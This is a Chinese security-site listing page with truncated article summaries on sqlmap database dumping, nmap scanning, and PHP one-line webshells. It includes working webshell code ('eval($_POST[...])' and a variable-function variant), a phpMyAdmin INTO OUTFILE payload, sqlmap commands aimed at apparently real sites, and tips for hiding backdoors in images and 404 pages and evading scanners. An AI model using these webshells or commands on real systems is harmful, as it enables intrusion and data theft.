服务器之家

专注于服务器技术!
当前位置:首页 > 服务器安全 > 安全工具

sqlmap实战教程 SQLMAP注入拖库常用命令

  SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。#> ./sqlmap.py -u “注入地址” -v 1 --dbs // 列举数据库 #> ./sqlmap.py -u “注入地...

日期:2017-01-19

sqlmap post注入案例 sqlmap常用指令和参数

  检查注入点 sqlmap.py -u "http://www.scshlx.com/TeachView.asp?id=21"列数据库信息 sqlmap -u "http://www.scshlx.com/TeachView.asp?id=21" --dbs指定库名列出所有表 //最大搜索线程为10 sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables指定库名表名列出所有字段 sqlm...

日期:2017-01-19

nmap的使用方法 在Kali Linux下实战Nmap的秘籍

  导读 在这第二篇 Kali Linux 文章中, 将讨论称为 ‘nmap‘ 的网络工具。虽然 nmap 不是 Kali 下唯一的一个工具,但它是最有用的网络映射工具之一。Nmap, 是 Network Mapper 的缩写,由 Gordon Lyon 维护(更多关于 Mr. Lyon 的信息在这里: http://insecure.org/fyodor/) ,并被世界各地许多的安全专业人员使用。...

日期:2017-01-19

linux nmap使用详解 nmap命令使用示例(nmap使用方法)

  Nmap是一款网络扫描和主机检测的非常有用的工具。Nmap是不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器。它可以适用于winodws,linux,mac等操作系统Nmap是一款非常强大的实用工具,可用于:检测活在网络上的主机(主机发现)检测主机上开放的端口(端口发现或枚举)检测到相应的端口(服务发现)...

日期:2017-01-19

使用用cmd命令行制作PHP图片一句话木马

  有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会把一句话放在图片里面,写成1.asp;.jpg 1.asp;jpg的格式上传上去,这样上传的时候系统检测是图片,然后在上传之后,会把这个文件当asp文件来处理,那么如何用cmd...

日期:2017-01-11

藏在404错误页面里的PHP一句话木马

  我在网上看到很多404页面隐藏的后门,可是大部分都容易给站长发现后删除。经过“asp大马官网”一手写的404错误页面php一句话木马,已经接近完美,百分之80的管理员也难发现。这个404后门唯一不足的就是不免杀过狗,有动手能力的朋友,可以自己添加免杀后门代码,这样就可以达到软件查杀不出来,站长肉眼发现不...

日期:2017-01-11

PHP一句话Webshell木马后门的变形和免杀技巧

   0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖. 0×01 字符串上的舞蹈 一般标准的一句话Webshell是利用PHP的eval函数,动态...

日期:2017-01-11

图片方式的php一句话木马工作原理以及代码

  标准的写法,直接通过eval执行php代码,如下:<?php@eval ($_POST['code']);?>动态执行assert生成一个木马文件(隐藏性最好的一种)如下:<?php@$_GET['a']($_GET['code']);?>使用方法:从url中传入下面参数执行后会在当前目录生成一个c.php的文件.如下:/index.php?a=assert&code=${fputs%28fopen%28base6...

日期:2017-01-11

超级猥琐的PHP一句话后门代码分享

  我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏P...

日期:2017-01-11

在phpmyadmin中写入一句话木马的方法

  下面我们一起来看看一篇关于phpmyadmin写入一句话木马的测试教程,希望此教程能够对各位有帮助。方法一,一句话木马偶尔拿到一个config中,发现是root,且还有phpmyadmin。好吧,试试select'<?php @eval($_POST[-77]);?>'INTO OUTFILE 'E:\Web\wp-content\errors.php'提示成功了,可是构造地址访问,提示404...

日期:2017-01-11
 101    1 2 3 4 5 6 7 8 9 10 下一页 尾页